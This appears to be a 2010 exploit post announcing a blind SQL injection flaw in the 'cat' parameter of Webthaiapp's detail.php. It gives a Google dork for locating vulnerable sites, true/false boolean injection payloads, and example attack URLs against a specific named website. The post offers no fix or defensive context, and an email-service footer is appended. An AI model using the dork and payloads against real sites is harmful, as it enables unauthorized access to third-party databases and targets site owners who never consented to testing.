--==+==================================================+==--

--==+             Webthaiapp detail.php(cat) Blind Sql injection 
Vulnerability                +==--

--==+==================================================+==--

Date : 30-04-2010

-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

AUTHOR: Xelenonz

Homepage : www.thaishadow.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Application : Webthaiapp

Vendor      : http://www.Webthaiapp.com/

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

DORK (google): "inurl:catalog/product/detail.php?cat="

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

DESCRIPTION:

EXPLOITS:



detail.php?cat=[valid catid]+and+1=1   << TRUE



detail.php?cat=[valid catid]+and+1=2  << False



-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



Example



http://www.lamthai.com/catalog/product/detail.php?cat=44+and+1=1  
<< True



http://www.lamthai.com/catalog/product/detail.php?cat=44+and+1=2 
<< False



-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



Special Thx : Krit admin@thaishadow,Thaishadow.com



-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 		 	   		  
_________________________________________________________________
Hotmail: อีเมลที่เชื่อถือได้ซึ่งมาพร้อมกับการป้องกันอีเมลขยะที่มีประสิทธิภาพ
https://signup.live.com/signup.aspx?id=60969